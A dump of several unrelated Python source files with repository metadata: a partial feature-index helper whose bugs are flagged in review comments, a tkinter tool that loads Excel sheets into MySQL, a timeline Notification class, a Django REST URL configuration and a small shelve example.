        if col in numeric_cols:
            # Numeric column: exactly one dimension, one index.
            feat_dict[col] = total_cnt
            total_cnt += 1
            continue
        # Categorical column: one index per distinct value.
        # NOTE(review): unique() keeps NaN while nunique() drops it, so a
        # column containing NaN gets one value without an index -- confirm
        # NaN-bearing columns are always listed in ignore_cols.
        unique_vals = df[col].unique()
        unique_cnt = df[col].nunique()
        feat_dict[col] = dict(zip(unique_vals, range(total_cnt, total_cnt + unique_cnt)))
        total_cnt += unique_cnt
    feat_size = total_cnt
    return feat_dict, feat_size
def parse(feat_dict=None, df=None, has_table=False):
    """
    Build the feature-index / feature-value inputs used for embedding lookup.

    :param feat_dict: dict produced by FeatureDictionary, used to look up the
                      feature index for a (column, value) pair
    :param df: input data; may be the train or the test frame (no need to
               concatenate them here)
    :param has_table: whether the data contains the label column (the
                      docstring in the original called this ``has_label``)
    :return: Xi, Xv, y
    """
    # NOTE(review): this function appears truncated in this file — it never
    # returns Xi/Xv/y and the loop below ends abruptly; confirm against the
    # full original source before relying on it.
    assert not (df is None), "df is not set"
    dfi = df.copy()
    if has_table:
        y = df['target'].values.tolist()
        dfi.drop(['id', 'target'], axis=1, inplace=True)
    else:
        ids = dfi['id'].values.tolist()  # ids of the samples to predict
        # NOTE(review): the column read above is 'id' but 'ids' is dropped
        # here — likely a typo; verify against the caller's schema.
        dfi.drop(['ids'], axis=1, inplace=True)  # axis : {0 or ‘index’, 1 or ‘columns’}, default 0
    # dfi holds feature indices: same shape as df, every cell becomes the
    # one-hot index of that feature.
    # dfv holds feature values: binary (0/1) for categorical features, or the
    # real value (e.g. 3.14) for numeric features.
    dfv = dfi.copy()
    for col in dfi.columns:
        if col in IGNORE_FEATURES:  # module-level globals: IGNORE_FEATURES, NUMERIC_FEATURES
            dfi.drop([col], axis=1, inplace=True)
            dfv.drop([col], axis=1, inplace=True)
            continue
        if col in NUMERIC_FEATURES:  # a numeric feature keeps one fixed index
            dfi[col] = feat_dict[col]
        else:
            # Categorical feature: each distinct value has its own index,
            # and the corresponding value is the one-hot indicator 1.0.
            dfi[col] = dfi[col].map(feat_dict[col])
            dfv[col] = 1.0
| [
"duboyabz@gmail.com"
] | duboyabz@gmail.com |
ef329163d8ddd24d65ba20c4af2ae929f5b09b6c | f6fd4aeeee18cb94ccc9de07ca71f5ed085c4fd9 | /gui.py | 88f601bc33d9963dfdec98015e696444daee8168 | [] | no_license | a7n007/lillyscripts | a00f6c7ed29639d66b3fe87554cf2f3f90f96936 | 85a4f46df6fcc750b5d33dd18768a29f3c6e0164 | refs/heads/master | 2020-04-07T05:02:03.701045 | 2019-05-31T10:29:20 | 2019-05-31T10:29:20 | 158,080,883 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,326 | py | #import tkinter
from tkinter import *
#create database and table
import mysql.connector
#import xlrd to read xcel files
import xlrd
root = Tk()
root.title("EXCEL to Mysql")
root.geometry("1000x1000+0+0")
root.configure(bg="black")
#INSTRUCTIONS :
lel = Label(root,text="INSTRUCTIONS : ",font=("arial",20)).pack()
lel = Label(root,text="1 . RENAME ALL FILES TO NUMBERS IN ASCENDING ORDER AND PLACE IN A FOLDER: ",font=("arial",15)).pack()
lel = Label(root,text="eg: if there are 3 files then 1.xlxs,2.xlxs,3.xlxs should be their names",font=("arial",20)).pack()
lel = Label(root,text="CHOOSE DEFAULT OR CUSTOM NOT BOTH",font=("arial",10)).pack()
#declare all variables
hst = StringVar()
usr = StringVar()
passd = StringVar()
tbname = StringVar()
dbname = StringVar()
aloc = StringVar()
n = IntVar()
lel = Label(root,text="ENTER YOUR SERVER DETAILS : ",font=("arial",15,"bold")).pack()
lel = Label(root,text="host : ",font=("arial",15,"bold")).pack()
eb1 = Entry(root,textvariable=hst,width=25).pack()
lel = Label(root,text="user : ",font=("arial",15,"bold")).pack()
eb2 = Entry(root,textvariable=usr,width=25).pack()
lel = Label(root,text="password : ",font=("arial",15,"bold")).pack()
eb3 = Entry(root,textvariable=passd,width=25).pack()
#custom settings
lel = Label(root,text="INSERT DATA : ",font=("arial",30,"bold")).pack()
n = IntVar()
lel = Label(root,text="enter your DB NAME ",font=("arial",15,"bold")).pack()
eb4 = Entry(root,textvariable=dbname,width=25).pack()
lel = Label(root,text="enter your TABLE NAME ",font=("arial",15,"bold")).pack()
eb5 = Entry(root,textvariable=tbname,width=25).pack()
def default_insert():
    """Create the target database and a 3-column table on the configured
    MySQL server, then show a confirmation label in the window.

    Reads host/user/password and the database/table names from the
    module-level Tk StringVars (hst, usr, passd, dbname, tbname).
    """
    mydb = mysql.connector.connect(
        host=hst.get(),
        user=usr.get(),
        passwd=passd.get())
    cursor = mydb.cursor()
    try:
        # NOTE: identifiers (database/table names) cannot be sent as query
        # parameters, so they are interpolated directly — this is only safe
        # because the names come from the local GUI user.
        cursor.execute("create database " + dbname.get())
        cursor.execute("use " + dbname.get())
        cursor.execute("create table " + tbname.get() +
                       " (name varchar(30),job varchar(30),mobile varchar(30))")
    finally:
        # Always release the cursor/connection, even if a statement fails
        # (the original leaked them).
        cursor.close()
        mydb.close()
    lel = Label(root,text="CREATED SUCCESFULLY",font=("arial",15,"bold")).pack()
# Button wired to default_insert(); creates the database and table.
btnd = Button(root,text="CLICK TO CREATE DATABASE AND TABLE",width=30,height=1,bg="Lightblue",command =default_insert).pack()
#read number of xcel files
lel = Label(root,text="enter your Number of EXCEL SHEETS ",font=("arial",15,"bold")).pack()
eb6 = Entry(root,textvariable=n,width=25).pack()
# Known vocabularies used by the spell-correction helpers below:
# job titles and Indian city names that sheet cells are matched against.
jobs = ["housemaids","babysitters","cooks","nannies","patientcare","helpers"]
names = ["mumbai"," new delhi","kolkata","bengaluru","hyderabad"," chennai"," ahmedabad","vishakapatnam","pune","surat","jaipur","lucknow","kanpur","nagpur","indore","jamshedpur","patna","durgapur","dhanbad","Vadodara"]
def lcs(X, Y, m, n):
    """Length of the longest common substring of X[:m] and Y[:n].

    Classic dynamic-programming table: cell (i, j) holds the length of the
    common suffix of X[:i] and Y[:j]; the answer is the maximum over the
    whole table.
    """
    table = [[0] * (n + 1) for _ in range(m + 1)]
    best = 0
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            if X[i - 1] == Y[j - 1]:
                table[i][j] = table[i - 1][j - 1] + 1
                if table[i][j] > best:
                    best = table[i][j]
    return best
def potential(name, ip):
    """Similarity score between a known word ``name`` and user input ``ip``.

    Score = number of positions (up to the shorter length) where the two
    strings carry the same character, plus 0.5 * the length of their
    longest common substring. Higher means more similar.

    Fixes vs. the original: removed the leftover debug ``print`` and
    collapsed the two branches, which computed the identical quantity
    (both called ``lcs(name, ip, len(name), len(ip))`` and compared
    characters over the shorter length).
    """
    # Position-by-position character matches over the shorter string.
    shorter = min(len(name), len(ip))
    pt = 0
    for c in range(shorter):
        if ip[c] == name[c]:
            pt += 1
    # Longest-common-substring overlap contributes at half weight.
    pt = pt + lcs(name, ip, len(name), len(ip)) * 0.5
    return pt
def selfcorrectn(ip):
    """Spell-correct a city name: return the entry of the module-level
    ``names`` list with the highest potential() score against ``ip``.

    Fixes vs. the original: the running best was stored in a variable
    named ``min`` (shadowing the builtin, and actually tracking a max),
    an unused local ``ipl`` was computed, and the best score was printed
    on every improvement — all removed.
    """
    best_score = -9999999999999
    best_name = ""
    for name in names:
        score = potential(name, ip)
        if best_score < score:
            best_score = score
            best_name = name
    return best_name
def selfcorrectj(ip):
    """Spell-correct a job title: return the entry of the module-level
    ``jobs`` list with the highest potential() score against ``ip``.

    Fixes vs. the original: renamed the running best away from the
    builtin name ``min`` (it tracks a maximum) and dropped the unused
    local ``ipl``.
    """
    best_score = -9999999999999
    best_job = ""
    for job in jobs:
        score = potential(job, ip)
        if best_score < score:
            best_score = score
            best_job = job
    return best_job
def custom_insert():
    """Read every numbered Excel workbook, spell-correct the name/job
    columns against the known vocabularies, and insert the rows into the
    user-configured MySQL table."""
    mydb = mysql.connector.connect(
        host=hst.get(),
        user=usr.get(),
        passwd=passd.get())
    cursor = mydb.cursor()
    lel = Label(root,text="CONNECTED SUCCESFULLY",font=("arial",15,"bold")).pack()
    #INSERT DATA FROM EXCEL FILES
    # NOTE(review): a second cursor is created here and the first one is
    # simply discarded — apparently redundant.
    cursor = mydb.cursor()
    # Switch to the database the user named in the GUI.
    sr = "use " + str(dbname.get())
    cursor.execute(sr)
    # Accumulate one list per output column across all workbooks.
    name=[]
    job=[]
    mobile=[]
    for k in range(1,n.get()+1):
        loc = (str(k))
        # NOTE(review): the workbook path is just "1", "2", ... with no
        # directory or .xlsx extension, although the on-screen instructions
        # say files are named like "1.xlxs" — confirm the expected file
        # naming before use.
        wb = xlrd.open_workbook(loc)
        sheet = wb.sheet_by_index(0)
        # Columns are identified by their header cell in row 0; only the
        # first three columns are inspected.
        for i in range(0,3):
            for j in range(1,sheet.nrows):
                if(sheet.cell_value(0,i)=='name'):
                    # Spell-correct city names against the `names` list.
                    x = selfcorrectn(sheet.cell_value(j,i))
                    name.append(x)
                if(sheet.cell_value(0,i)=='job'):
                    # Spell-correct job titles against the `jobs` list.
                    x = selfcorrectj(sheet.cell_value(j,i))
                    job.append(x)
                if(sheet.cell_value(0,i)=='mobile'):
                    mobile.append(sheet.cell_value(j,i))
    # Insert the collected tuples into the user-named table; row values go
    # through %s placeholders, but the table name itself is interpolated.
    sql = 'insert into '+tbname.get() +' (name,job,mobile) values(%s,%s,%s)'
    for i in range(0,len(name)):
        tup = (name[i],job[i],str(mobile[i]))
        cursor.execute(sql,tup)
    mydb.commit()
    lel = Label(root,text="Dumped ,check your database",font=("arial",15,"bold")).pack()
# Button wired to custom_insert(); reads the workbooks and fills the table.
btn = Button(root,text="CLICK TO INSERT into table",width=30,height=1,bg="Lightblue",command =custom_insert).pack()
#loop this file
# Enter the Tk event loop; blocks until the window is closed.
root.mainloop()
"noreply@github.com"
] | noreply@github.com |
eba02e9038c9938b77410423ec74c8f662de3900 | dc40f134d3713c0a4951588182bbe64b580761ef | /web/timeline/notification.py | 03e878a7ae2d6364135b9aa836ab2a0d4f958722 | [
"MIT"
] | permissive | hkpeprah/television-2.0 | 79eaa553dc1246fc9fb468fd14830ef7fdccc3b7 | 8d6ce9cc7c8e22447769845159464422153cb8f6 | refs/heads/master | 2021-01-15T15:34:02.739470 | 2015-10-18T00:02:44 | 2015-10-18T00:05:15 | 38,463,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | from base import ValidatableObject
from fields import DateField
from layout import Layout
class Notification(ValidatableObject):
    """
    Notification object.

    A validatable timeline object carrying the time at which the
    notification fires and the layout used to render it.
    """
    def __init__(self, *args, **kwargs):
        # When the notification is delivered; marked required so the
        # validation layer rejects notifications without a time.
        self.time = DateField(required=True)
        # Visual layout of the notification.
        self.layout = Layout()
        # NOTE(review): *args/**kwargs are accepted but not forwarded to
        # ValidatableObject.__init__ — they are silently dropped here;
        # confirm whether the base class expects them.
        super(Notification, self).__init__()
"ford.peprah@uwaterloo.ca"
] | ford.peprah@uwaterloo.ca |
9e8f98113d5172a7d06f4107a2986b94b9e633be | d092a6a5622b8efa4d43c11708d50b0fcce832f7 | /DictionaryBE/Dictionary/urls.py | 2b3a07ca656c271c7de9b5abd047ab74646b5ff7 | [] | no_license | sjovanov/MK-Dict | 75f52921b88c0a538f8005399fe41fda12cbc906 | f723bd9bf09eb7c505077695513c32accfe364a0 | refs/heads/main | 2023-03-19T00:51:40.523391 | 2021-03-16T11:52:56 | 2021-03-16T11:52:56 | 338,067,109 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | """Dictionary URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
# from django.contrib import admin
from django.urls import path, include
from words.views import WordViewSet, SentenceViewSet, UserViewSet
from rest_framework import routers
from rest_framework.authtoken.views import obtain_auth_token
# DRF router auto-generates list/detail routes for each registered viewset.
router = routers.DefaultRouter()
router.register(r'words', WordViewSet)
router.register(r'sentence', SentenceViewSet)
router.register(r'users', UserViewSet)
urlpatterns = [
    # API root: exposes words/, sentence/ and users/ endpoints.
    path('', include(router.urls)),
    # Login/logout views for the browsable API.
    path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
    # POST username/password here to obtain a DRF auth token.
    path('auth/', obtain_auth_token),
]
| [
"stefan.jovanov98@gmail.com"
] | stefan.jovanov98@gmail.com |
d947f5ef0633272965e0c668af89b9c0bcf56449 | c28ccac2daa674df07470a85d13552639a98e323 | /shelvefile2.py | 14094e86f477a765c391151e84967ea720df30cf | [] | no_license | jnprogrammer/basic_python | 69f2ff356ebf1da120789884f99aea197856e6c0 | 99fe4d6bb8c6aafd3701cc725e511e9967d9b0ca | refs/heads/master | 2022-09-26T00:39:32.347757 | 2020-06-02T02:43:04 | 2020-06-02T02:43:04 | 261,020,958 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | import shelve
#with shelve.open('ShelfTest') as fruit:
fruit = shelve.open('ShelfTest')
fruit['apple'] = "1 fruit"
fruit['lemon'] = "2 fruit"
fruit['grape'] = "3 fruit"
fruit['lime'] = "4 fruit"
fruit['orange'] = "5 fruit"
print(fruit["lemon"])
print(fruit["lime"])
fruit.close()
print(fruit) | [
"joshuanparker@gmail.com"
] | joshuanparker@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.